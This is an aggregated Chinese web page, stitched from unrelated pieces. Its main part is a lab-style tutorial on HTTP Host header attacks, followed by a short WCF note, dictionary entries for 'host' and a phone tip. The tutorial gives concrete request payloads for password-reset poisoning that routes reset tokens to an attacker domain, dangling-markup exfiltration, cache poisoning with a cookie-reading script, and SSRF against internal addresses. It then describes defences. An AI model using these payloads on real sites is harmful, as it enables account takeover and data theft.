目录:
- 1、weblogichost头攻击配置
- 2、WebServiceHost有何特别之处
- 3、host a website 是什么意思?怎么翻译?
- 4、host的用法及例句
- 5、hosting是什么意思?
- 6、想入web is 系统的手机体验下、哪个型号比较好?
weblogichost头攻击配置
1. HTTP Host头攻击
从HTTP / 1.1开始,HTTP Host标头是必需的请求标头。它指定客户端要访问的域名。例如,当用户访问时,其浏览器将组成一个包含Host标头的请求,如下所示:
GET /web-security HTTP/1.1
Host: example.net
HTTP Host头的目的是帮助识别客户端要与之通信的后端组件。如果请求不包含Host头或者格式不正确,则在将传入请求的应用程序时可能会导致问题。
从历史上看,这种漏洞并不存在太大问题,因为每个IP地址只会被用于单个域的内容。如今,很大程度上是由于同一个IP上存在多个Web应用程序(不同端口,不同域名解析等),通常可以在同一IP地址访问多个网站和应用程序。这种方法的普及也部分是由于IPv4地址耗尽所致。
当可以通过同一IP地址访问多个应用程序时,最常见的原因是以下情况之一:
虚拟主机
单个Web服务器托管多个网站或应用程序。这可能是具有单个所有者的多个网站,但是也可能是不同所有者的网站托管在同一个共享平台上。它们都与服务器共享一个公共IP地址。
通过代理路由流量
网站托管在不同的后端服务器上,但是客户端和服务器之间的所有流量都通过代理系统进行路由。这可能是一个简单的负载平衡设备或某种反向代理服务器。在客户通过内容分发网络(CDN)访问网站的情况下,这种设置尤其普遍。
在上面两种种情况下,即使网站托管在单独的后端服务器上,它们的所有域名也都解析为中间组件的单个IP地址。这带来了与虚拟主机相同的问题,因为反向代理或负载平衡需要知道每个请求到的哪个后端上。
HTTP Host头的作用就在于,指定请求应该发送到那个应用程序的后端服务器上。打个比方,一封信需要送到居住在公寓楼中的某人手中,整个公寓有许多房间,每个房间都可以接受信件,通过指定房间号和收件人(也就是HTTP Host头)来将信封送到指定的人手中。
3. 什么是HTTP Host头攻击
一些网站以不安全的方式处理Host头的值。如果服务器直接信任Host头,未校验它的合法性,则攻击者可能能够使用此可控变量来注入Host,以操纵服务器端的行为。
现成的Web应用程序通常不知道将它们部署在哪个域上,除非在安装过程中在配置文件中手动指定了该域。例如,当他们需要知道当前域以生成电子邮件中包含的绝对URL时,他们可能依赖于Host头中的值:
a href="https://vps.456.cn/p/['HOST']/support"联系支持/a
Host头值还可以用于不同网站系统之间的各种交互。
由于Host头实际上是用户可控制的,因此这种做法可能导致许多问题。如果未校验或者直接使用Host头,则Host头可以与一系列其他漏洞“组合拳”攻击,比如:
缓存投毒
特殊业务功能的逻辑漏洞
基于路由的SSRF
经典服务端漏洞,如SQL注入(当Host被用于SQL语句时)等
4. 如何发掘HTTP Host头攻击
首先要判断服务端是否检测Host头?检测完了是否还使用Host头的值?
通过修改Host的值,如果服务端返回错误信息:
30b04453d11b44a56c903cc387f17296.png
则说明服务端检测了Host的内容。至于有没有使用Host头的值,有以下几种方法去发掘:
修改Host值
简单的来说,可以修改HTTP头中的Host值,如果观察到响应包中含有修改后的值,说明存在漏洞。
但有时候篡改Host头的值会导致无法访问Web应用程序,从而导致“无效主机头”的错误信息,特别是通过CDN访问目标时会发生这种情况。
添加重复的Host头
添加重复的Host头,通常两个Host头之中有一个是有效的,可以理解为一个是确保请求正确地发送到目标服务器上;另一个则是传递payload到后端服务器中。
GET /example HTTP/1.1
Host: vulnerable-website.com
Host: attackd-stuff
使用绝对路径的URL
尽管许多请求通常在请求域上使用相对路径,但是也同时配置了绝对URL的请求。
GET HTTP/1.1
Host: attack-stuff
有时候也可以尝试不同的协议,如HTTP或HTTPS。
添加缩进或换行
当一些站点block带有多个Host头的请求时,可以通过添加缩进字符的HTTP头来绕过:
GET /example HTTP/1.1
Host: attack-stuff
Host: vulnerable-website.com
注入覆盖Host头的字段
与Host头功能相近的字段,如X-Forwarded-Host、X-Forwarded-For等,这些有时候是默认开启的。
GET /example HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: attack-stuff
诸如此类,还有其他的字段:
X-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded
忽略端口仅校验域名
当修改、添加重复Host头被拦截的时候,可以尝试了解Web应用程序是怎样解析Host头的。
比如,一些解析算法会忽略Host头中的端口值,仅仅校验域名。这时候可以将Host修改为如下形式:
GET /example HTTP/1.1
Host: vulnerable-website.com:attack-stuff
保持域名不变,修改端口值为非端口号的其他值(非数字), 将Host头攻击的payload放在端口值处,同样能进行Host头攻击。
5. HTTP Host头攻击漏洞示例
5.1 密码重置中毒
根据HTTP Host头攻击的攻击特点,它被广泛应用于密码重置中毒:攻击者可以操纵网站在重置密码情况下生成的密码重置链接,使其发送攻击者指定的域下,利用此来窃取重置任意用户密码的令牌。
1c2aa7d6f7e77ca7c2bd09feee527087.png
一个重设密码(忘记密码)功能的大致流程如下:
用户输入其用户名或电子邮件地址,然后提交密码重置请求。
该网站检查该用户是否存在,然后生成一个临时的、唯一的、复杂的令牌,该令牌与后端的用户帐户相关联。
该网站向用户发送一封电子邮件,其中包含用于重置其密码的链接。重置令牌的参数包含在相应的URL中:
4. 当用户访问此URL时,网站将检查提供的令牌是否有效,并使用它来确定要重置哪个帐户。如果一切都符合,则可以进入用户重置密码步骤。最后,令牌被销毁。
以上步骤的安全性依赖于:只有目标用户才能访问其电子邮件,从而可以访问其唯一的令牌。
密码重置中毒是窃取此令牌以更改另一个用户密码的一种漏洞。
如果网站重置密码的流程完全依赖用户的可控输入(如HTTP Host头),这可能导致密码重置中毒:
1. 攻击者获取受害者的用户名或者电子邮件,作为提交重置密码的请求,攻击者会拦截请求并修改HTTP Host头为其指定的域,如evil-user.net
2. 受害者会收到一封重置密码的邮件,但由于攻击者修改了Host头,而web程序生成重置链接又完全依赖于Host头,导致生成以下URL:
3. 如果受害者点击了该链接,重置密码的令牌就会发送到攻击者的服务器 evil-user.net 上
4. 当攻击者获取到虫子密码的令牌之后,就会进行相应的构造访问真实重置密码的URL进行密码重置。
5.1.1 密码重置中毒—基础
详细了解了上面的密码重置中毒的流程和原理之后,这里通过HTTP Host头攻击导致的基础的密码重置中毒来演示。
首先输入用户名或者用户的电子邮箱来重置指定用户的密码:
534a1d062ccc3813b6596fdec0bb475b.png
提交之后,会发送一封重置密码的电子邮件到wiener用户的邮箱中(数据包如右图):
7c47a2e653a4fcbbaeae1687f914d093.png
注意重置密码的链接,可能是受Host头的值的影响?
我们来验证一下是否存在HTTP Host头攻击,修改Host头的值为 baidu.com:
8901c053cc8c3e6f0383f5f61b14d549.png
发现请求是可以被后端服务器接收的,所以是存在HTTP Host头攻击的。
这里就输入受害用户carlos进行重置密码,然后抓包将Host头的值改为我们自己的服务器:
ec1f439fbc6013f1b4f71011a2885947.png
然后在我们自己的服务器上就可以通过访问日志看到被窃取的重置密码Token:
c3b81283ee2a440dcf205a1ab344ab32.png
然后根据已知链接规律,构造重置密码的链接:
1a4ba4a58416c68b3f513ba1239f76d9.png
随即进入输入新密码的界面,密码重置中毒成功。
5.1.2 密码重置中毒—注入覆盖Host头的字段
有时候直接修改Host头、添加重复Host头的值以及混淆Host头都不行:
3ca0c53bfef0d9b47a9f788eb484f40f.png
可以尝试使用与Host头功能相同的HTTP字段,如X-Forwarded-Host、X-Forwarded-For等,可以进行Fuzz:
cbb645bac4d5b28e8b91c39b174a0767.png
实际上他能够被 X-Forwarded-Host 字段影响,导致Host头攻击,当同时添加多个字段使请求被拦截时,可以尝试类似排除法、二分法来排查哪个字段有效。
对受害用户carlos进行密码重置投毒:
53fd95a8a051dd84951094b4e3e79502.png
然后构造链接即可:
efb5ab58ec4a711faa6f4dac736e069a.png
5.1.3 重置密码中毒—Dangling Markup技术
首先简单介绍一下 Dangling Markup技术:
Dangling markup技术
Dangling markup技术, 是一种无需脚本即可窃取页面内容的技术,它使用图像等资源(结合CSP运行的策略)将数据发送到攻击者控制的远程位置。当反射型XSS不工作或被内容安全策略(CSP)阻止时,它非常有用。其思想是插入一些未完成状态的部分HTML,例如图像标记的src属性,页面上的其余标记关闭该属性,但同时将两者之间的数据(包含窃取页面的内容)发送到远程服务器。
例如,我们在反射型XSS注入点上注入这样一个img标签:
img src="https://vps.456.cn/p/?
则注入点和下一个双引号的代码将会发送到攻击者的%20%20服务器,%20其中被发送的代码或者内容可能包含一些敏感信息,%20例如CSRF%20Token等,%20配合反射型XSS以完成CSRF的利用。
关于%20Dangling%20Markup技术%20的实战意义可以参考博主之前的文章:绕过CSP之Dangling%20markup技术
什么时候可以使用%20Dangling%20Markup技术%20呢?与我们这篇文章的主题有什么关系呢?
我们直接进入主题,当输入需要重置密码的用户名后,该用户的邮箱内会收到如下邮箱:
67a4c2bc755ebbb44847d23189d30422.png
有一个跳转到登录界面的链接,后面紧接着重置之后的随机密码。
此时考虑一下,该链接是否是从Host头取值而来?只要这个值可控,那么就可以利用Host头攻击实施%20Dangling%20Markup攻击,包含住链接后面紧跟着的密码,再结合Host头攻击将请求指定到攻击者服务器上。一个漫天过海的窃取行为就完成了。
第一步,寻找Host头攻击点:
通过Fuzz,可发现Host头攻击类型为%20忽略端口仅校验域名。即服务端在校验Host域的时候,仅校验了域名,忽略了后面的端口号,造成端口值可控(可以是数字或字符):
904608f5a5bb3404d1ef62f6c92481b9.png%20a59bf77cc52ad88158c7fdc06202e54b.png
通过在Host头的端口中注入payload,依旧可以实现Host头攻击。
第二步,借助可控变量%20Host:ip:port%20来实施%20Dangling%20Markup技术,从而将后面的密码外带到攻击者服务器上:
注意,需要闭合此处的双引号出去,经过尝试,输入单引号时,服务端会自动转为双引号,故这里通过单引号将双引号闭合,然后添加自定的a%20href=xxx.attack-domain标签将密码外带:
184e31cb9b0426e30db33340e2e16c91.png
原本的正常HTML是这样的:
ed4e92688d41cd5e90434d73f12aa811.png
通过Dangling%20Markup技术%20在a标签的链接中注入?%20符,使得后面的值在双引号闭合之前全部被当做URL参数请求到攻击者服务器上:
b90e561f45ba0a4e1df4f0363069921e.png
这也是%20Dangling%20Markup技术%20的精髓所在,该技术的核心点在于:
可控变量后面是否接着需要窃取的关键数据(包括Token、密码等)
在攻击者服务器上可以看到被Host头攻击转发上来的请求,里面成功窃取了受害者重置后的密码:
d1f9d32d9c0a753a3088e81d382ce9e6.png
5.2%20Host头攻击+缓存投毒
当存在Host头攻击的web站点不存在密码重置的功能的时候,此时该漏洞就显得没有影响,因为不可能驱使用户去抓包修改Host头,辅助攻击者完成一系列的攻击。
但是,如果目标站点使用Web缓存,则可以通过缓存投毒给其他用户提供带有病毒的缓存响应。此时的Host头攻击漏洞转变为类似XSS存储型类的漏洞。要构造Web缓存投毒攻击:
1.%20需要寻找映射到其他用户请求的缓存键;
2.%20下一步则是缓存此恶意响应;
3.%20然后,此恶意缓存将提供给尝试访问受影响页面的所有用户。
第一步,寻找Host头攻击点:
通过对站点的主页添加重复的Host值,可以达到覆盖的效果,并验证存在Host头攻击:
b09b4eeacd00d364633ccda68d1de500.png
第二步,寻找是否使用了Web缓存?缓存键是什么?
从上图中也可以发现,站点使用了Wen缓存功能,并且配合Host头攻击,可以缓存/resources/js/tracking.js资源文件。
第三步,在攻击者服务器上创建一个同名的%20/resources/js/tracking.js资源文件,内容为:
alert(document.cookie);
然后通过Host头注入攻击者服务器域名,可以看到在响应中正确地对应了我们的%20/resources/js/tracking.js资源文件:
8458208389ca34f2736aea5e82afc11e.png
发送多次请求,使该请求的响应变为缓存:
200f4558b179f6aa8cd8bda18f763b66.png
当其他用户请求站点主页时,服务端就会提供该恶意缓存给用户,造成缓存投毒。
5.3%20Host头攻击绕过访问控制
出于安全考虑,通常网站对某些功能的访问限制为内部用户使用。但是通过Host头攻击一定可能上可以绕过这些限制。
对于一个站点,从发现Host头攻击到利用,下面来展示一个完整的流程:
第一步,访问主页,随意修改Host的值:
9649967593356ece9722484a91980ff3.png
注意,这里的Host的值不会出现响应包中,但是依然可能存在Host头攻击,因为响应依然成功,说明服务端没有对Host头做验证。
第二步,寻找敏感页面,通过%20/robots.txt%20知道%20/admin%20为做了访问控制的页面:
d3fd91199b6c914ec44a0b7659f56e1d.png
可以错误信息提示,/admin%20页面只允许本地用户访问。
第三步,将Host改为服务端内部地址,从而绕过IP访问控制:
c66736849f5149d01997ea9edbf9f1ce.png
5.4%20Host头攻击+SSRF
Host头攻击可能会导致基于路由的SSRF攻击,称为:Host%20SSRF%20Attack。
经典的SSRF攻击通常基于XXE或可利用的业务逻辑,将用户可控的URL作为HTTP请求发送;而基于路由的SSRF依赖于云部署的体系结构中,包括负载均衡和反向代理,这些中间件将请求分配发送到对应的后端服务器处理,如果服务端未校验Host头转发的请求,则攻击者可能会将请求发送(重定向)到体系中的任意系统。
这可能需要知道内部系统的IP地址(私有地址),一般可以通过信息收集或者Fuzz来判断有效的私有IP地址(如枚举192.168.1.1/16)。
5.4.1%20基础Host头攻击+SSRF
比如,普通方式访问不到%20/admin%20页面(404):
774952d6bc5c1f9c84078f832d213f06.png
猜测%20/admin%20存在于内网中,需要内网机器才能访问,但是配合Host头攻击+SSRF可以绕过并访问。
第一步,判断Host是否被使用,可用DNSLog外带
这里我使用Burp自带的%20“Burp%20Collaborator%20client”%20%20来实现外带:
fe89ddd297619cc7283a92ba551a877e.png
说明服务端是根据Host头的域名来请求资源的。
第二步,基于Host头的SSRF探测内网主机
假如一些敏感的页面(比如管理页面),深处于内网,外网无法访问,但是通过Host头攻击+SSRF可达到绕过访问控制,从而访问内网资产,这里Fuzz内网的IP的C段为192.168.0.0/24,直接利用Intruder枚举:
a450a6e1f580ed2201f1e7a20d8c7395.png%208f19202c9c4fc0a81696f084f2066d1d.png
得到内网IP为192.168.0.240
第三步,访问内网资源
构造%20/admin%20页面,在Host处换位内网IP:
4522a7e735f469b8221d677c8b6a1966.png
5.4.2%20Host头攻击+SSRF—使用绝对路径的URL
有时候服务端会校验Host头的值,如果Host被修改,服务端会拒绝一切修改过后的请求:
591a625e712178e117db63b2d5e217fc.png
普通请求通常在请求域上使用相对路径,但是,服务端也同时可能配置了绝对URL的请求,采用如下形式可绕过对Host的验证:
GET%20%20HTTP/1.1
4030f968be73cbd6bf90f8e61dde4d2a.png
接着用%20“Burp%20Collaborator%20client”%20进行外带:
6b68718a8514a4b9803f40b8d227d959.png
外带成功,说明Host头被服务端使用来向指定域名请求资源,直接SSRF爆破内网:
675515a890884884ce25786619575ca2.png
访问内网页面:
4e7c3841b5c7ee2aaa0e6f3bf75e4bad.png
6%20HTTP%20Host头攻击防护
最简单的方法是避免在服务器端代码中完全使用Host头,可以只使用相对URL。
其他方法包括:
6.1%20正确配置绝对域名URL
当必须使用绝对域名URL时,应在配置文件中手动指定当前域的URL,并引用配置的值,而不是从HTTP的Host头中获取。这种方法可防止密码重置的缓存投毒。
6.2%20白名单校验Host头的域
如果必须使用Host头,需要正确校验它的合法性。这包括允许的域,并使用白名单校验它,以及拒绝或重定向对无法识别的主机请求。这包括但不仅限于单个web应用程序、负载均衡以及反向代理设备上。
6.3%20不支持主机头覆盖
确保不适用与Host头功能相近的字段,如X-Forwarded-Host、X-Forwarded-For等,这些有时候是默认开启的。
值得一提的是,不应该将内网使用的Host主机(不出网)与公网的应用程序托管在同一个服务器上,否则攻击者可能会操纵Host头来访问内部域。
WebServiceHost有何特别之处
由于WebHttpBehavior提供了帮助页面,所以当我们通过WebServiceHost对REST服务进行寄宿的时候会屏蔽掉通过ServiceDebugBehavior服务行为提供的帮助页面。由于通过服务行为ServiceMetadataBehavior实现的元数据发布机制是基于SOAP的,如果我们在寄宿服务上应用了ServiceMetadataBehavior行为,WebServiceHost也会将基于HTTP-GET的元数据发布功能屏蔽。
host a website 是什么意思?怎么翻译?
host一般作名字使用,意思是主人,东道主的意思。
这里用作动词,帮名思义,既然是主人,当然是管理,掌管的意思。这里的意思便是经营一个网站。
host的用法及例句
host
英[həust] 美[host]
n.
1.东道主, 主人
2.主办人[地方, 机构等]
3.(电视等的)节目主持人
4.(寄生动植物的)寄主,宿主
5.(成圣体的面饼)祭品,祭饼
n.
1.大量, 许多
2.军队
3.〈计〉主计算机, 主机
vt.
1.主办,主持(活动)
2.主持(电视或广播节目等)
3.作为主人组织(聚会);做东名词 n.
1.东道主, 主人
2.主办人[地方, 机构等]
3.(电视等的)节目主持人
Who will be the host for tonight's program?
谁是今晚的节目主持人?
4.(寄生动植物的)寄主,宿主
5.(成圣体的面饼)祭品,祭饼
名词 n.
1.大量, 许多
2.军队
The host attacked the city unexpectedly.
军队突袭了那座城市。
The host is[are] ready to fight.
军队时刻准备投入战斗。
3.〈计〉主计算机, 主机
及物动词 vt.
1.主办,主持(活动)
2.主持(电视或广播节目等)
3.作为主人组织(聚会);做东
hosting是什么意思?
host
[hEust]
n.
主人, 旅馆招待 许多
vt.
当主人招待
主机
Host
主机
host
host 1
AHD:[h½st]
D.J.[houst]
K.K.[host]
n.(名词)
One who receives or entertains guests in a social or an official capacity.
主人,东道主:以社会身份或官方身份接待或款待客人的人
A person who manages an inn or a hotel.
酒店业主:经营酒馆或旅馆的人
One that furnishes facilities and resources for a function or an event:
主办国:为一庆典或事件提供设备和资源的人:
the city chosen as host for the Olympic games.
这个城市被选为举办奥运会的主办国
The emcee or interviewer on a radio or television program.
主持人:电台或电视节目中的主持人或采访者
Biology The animal or plant on which or in which another organism lives.
【生物学】 宿主,寄主:有另一种生物寄生其上的动植物
Medicine The recipient of a transplanted tissue or organ.
【医学】 移植接受体:移植组织或器官的接受体
v.tr.(及物动词)
host.ed, host.ing, hosts【用法疑难】
To serve as host to or at:
作东,请客:
“the garden party he had hosted last spring”(Saturday Review)
“去年春天他主办的花园聚会”(星期六评论)
Middle English [host, guest]
中古英语 [主人,客人]
from Old French
源自 古法语
from Late Latin hospes hospit- * see ghos-ti-
源自 后期拉丁语 hospes hospit- *参见 ghos-ti-
host“ly
adj.(形容词)
Host was used as a verb in Shakespeare's time, but this usage was long obsolete when the verb was reintroduced (or perhaps reinvented) in recent years to mean “perform the role of a host.” The usage occurs particularly in contexts relating to institutional gatherings or television and radio shows, where the person performing the role of host has not personally invited the guests to his or her own establishment (thus it would be odd to say This evening we are hosting a dinner party at our house for my husband's cousins from New York ). Perhaps because the verb involves a suspect extension of the traditional conception of hospitality, it initially met with critical resistance. In a 1968 survey only 18 percent of the Usage Panel accepted the usage in the sentence The Cleveland chapter will host this year's convention. Over time, however, the usage has become increasingly well established and appears to serve a useful purpose in describing the activities of one who performs the ceremonial or practical role of a host (in arranging a conference or entertainment, welcoming guests, and so forth). In our most recent survey 53 percent of the Panelists accepted the usage in the phrase a reception hosted by the Secretary of State. The verb is less well accepted when used to describe the role of a performer who acts as a master of ceremonies for a broadcast or film, where the relation of the word to the notion of “hospitality” is stretched still further. Only 31 percent of the Panel accepted the use of the verb in the sentence Students have watched Sex, Drugs and AIDS, a graphic film hosted by actress Rae Dawn Chong. · The verb cohost has likewise become well established in its use to refer to those who collaborate in assuming responsibility for an occasion. Fifty-eight percent of the Usage Panel accepted this use in the sentence The Department of Architecture and the Department of History will be cohosting a reception for conference participants.
Host 一词在莎士比亚时代用作动词, 但自那时起这一用法很长时间不用了,直到近年来又被重新起用(或者可能重新创造),用来表示“担当主人的角色”。 这一用法尤其在学术聚会或电视、电台节目的情况下使用,在这些情况下,身为主人的人并没有以私人身份邀请客人去到他或她自己的家中,(这样的话,如果我们说今天晚上我们将在家中为我丈夫来自纽约的表兄妹‘主办’一个晚餐会 就会觉得有点别扭)。 也许是因为有人认为这一动词用法会扩大传统的“好客”概念,所以一开始它就遭到了批评性抑制。在1968年的一次调查中,用法专题使用小组中18%的成员在如下句子中的用法,即克利夫兰分会将主办本年度的大会。 但是,随着时间的推移,这一用法已逐渐被接受,并在描绘一个担当司仪或具体的主人任务(例如安排会议或娱乐活动,欢迎客人等等)时起到了很好的作用。在我们最近一次的调查中,用法专题使用小组中的53%的成员接受了短语由国务卿出面举办的招待会 中“host”一词的用法。 但当这一动词用法用来描绘作为广播节目或电影节目的主持人的主持工作时,人们就不太接受其用法,因为这样用,这个词与“好客”这一概念的关系就更松了。只有31%的用法专题使用小组成员接受host在句子学生们观摩了 由 演员雷·唐·宗主持解说的纪录片 ‘性、毒品与艾滋病’”中的动词用法。 同样,用来表示分工合作共同举办某一活动的动词cohost 也已被普遍接受。 58%的用法专题使用小组成员接受这一动词在如下句子中的用法:建筑系和历史系将共同为与会者举办一次招待会
host
host 2
AHD:[h½st]
D.J.[houst]
K.K.[host]
n.(名词)
An army.
军队
A great number; a multitude.See Synonyms at multitude
许多;众多参见 multitude
Middle English
中古英语
from Old French
源自 古法语
from Late Latin hostis
源自 后期拉丁语 hostis
from Latin [enemy] * see ghos-ti-
源自 拉丁语 [敌人] *参见 ghos-ti-
host
host 3也作 Host
AHD:[h½st]
D.J.[houst]
K.K.[host]
n.Ecclesiastical (名词)【基督教会】
The consecrated bread or wafer of the Eucharist.
圣体:圣餐中献祭的面包和圣饼(未发酵的圆面包片)
Middle English
中古英语
from Latin hostia [sacrifice]
源自 拉丁语 hostia [奉献]
host
[hEust]
n.
主人(对宾客而言)
(广播, 电视的)节目主持人
旅馆老板
【生】寄主, 宿主
【物】晶核, 基质
[常Host ]【宗】圣饼, 圣餐用面包
a host country
东道国
host
[hEust]
vt.
主办(宴会等); 款待, 作主人招待
The conference was hosted by that committee.
该委员会充当这个会议的东道主。
host-crystal
n.
主晶
hostless
adj.
hostly
[`hEJsth]
adv.
hostship
n.
be at host
[废]寄宿(旅店等), 被招待, 作客; 与(某人)很熟, 与某人关系亲密(with)
lie at host
[废]寄宿(旅店等), 被招待, 作客; 与(某人)很熟, 与某人关系亲密(with)
play host to
招待, 接待
reckon without one's host
没有通知主人(或房东)自行结帐; 没有与主要有关人员磋商便做出决定; 忽视主要因素, 没有考虑到别人的反对; 自作主张; 错误估计
accidental host
偶见寄主
alternate host
轮换寄主
animal host
动物寄主
bridge host
过渡寄主; 中间宿主
congenial host
同质感病寄主
final host
最后寄主
intermediate host
中间寄主[宿主]
laser host
激光器基质
non-permissive host
非许可性寄主
permanent host
永久寄主
second intermediate host
第二中间寄主
host
来自古法语 host,guest 拉丁语 hospes
想入web is 系统的手机体验下、哪个型号比较好?
WEB OS的手机,建议您买胖梨,淘宝一搜就知道是啥,胖梨3配置最高,900到1200左右,胖梨1入门,胖梨2最合适,希望能帮到你
评论前必须登录!
注册